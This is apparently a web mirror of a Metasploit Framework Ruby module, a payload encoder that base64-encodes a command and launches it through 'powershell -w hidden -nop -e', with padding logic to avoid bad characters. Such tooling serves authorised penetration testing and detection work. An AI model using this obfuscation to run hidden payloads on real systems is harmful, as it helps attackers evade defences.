CoCalc -- powershell

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/cmd/powershell_base64.rb
¹⁹⁷²⁰ views

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Encoder
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::Windows
10

11
  def initialize
12
    super(
13
      'Name' => 'Powershell Base64 Command Encoder',
14
      'Description' => %q{
15
        This encodes the command as a base64 encoded command for powershell.
16
      },
17
      'Author' => 'Ben Campbell',
18
      'Arch' => ARCH_CMD,
19
      'Platform' => 'win')
20
  end
21

22
  #
23
  # Encodes the payload
24
  #
25
  def encode_block(state, buf)
26
    # Skip encoding for empty badchars
27
    if state.badchars.empty?
28
      return buf
29
    end
30

31
    if (state.badchars.include? '-') || (state.badchars.include? ' ')
32
      return buf
33
    end
34

35
    cmd = encode_buf(buf)
36

37
    if state.badchars.include? '='
38
      while cmd.include? '='
39
        buf << ' '
40
        cmd = encode_buf(buf)
41
      end
42
    end
43

44
    cmd
45
  end
46

47
  def encode_buf(buf)
48
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c '#{Msf::Post::Windows.escape_powershell_literal(buf)}'"))
49
    "powershell -w hidden -nop -e #{base64}"
50
  end
51
end
52

53

Product

Resources

Company